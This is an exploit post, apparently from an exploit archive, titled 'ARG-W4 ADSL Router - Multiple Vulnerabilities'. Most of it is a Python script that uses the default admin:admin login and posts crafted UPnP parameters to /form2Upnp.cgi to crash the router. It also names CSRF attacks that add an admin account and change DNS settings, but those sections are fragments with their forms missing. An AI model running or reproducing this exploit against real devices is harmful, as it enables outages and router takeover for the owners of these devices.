# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities # Date: 2016-12-11 # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM # Tested on: Windows AND Linux # Exploit Demo : http://persian-team.ir/showthread.php?tid=196 1 - Denial of Service #!/usr/bin/python import urllib2 import urllib site=raw_input("Enter Url : ") site=site+"/form2Upnp.cgi" username='admin' password='admin' p = urllib2.HTTPPasswordMgrWithDefaultRealm() p.add_password(None, site, username, password) handler = urllib2.HTTPBasicAuthHandler(p) opener = urllib2.build_opener(handler) urllib2.install_opener(opener) post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'} data = urllib.urlencode(post) try: html = urllib2.urlopen(site,data) print ("Done ! c_C") except: print ("Done ! c_C") 2-1 Cross-Site Request Forgery (Add Admin)
USER: PWD: RPWD:
2-2 Cross-Site Request Forgery (Change DNS)
DNS DNS 2 DNS 3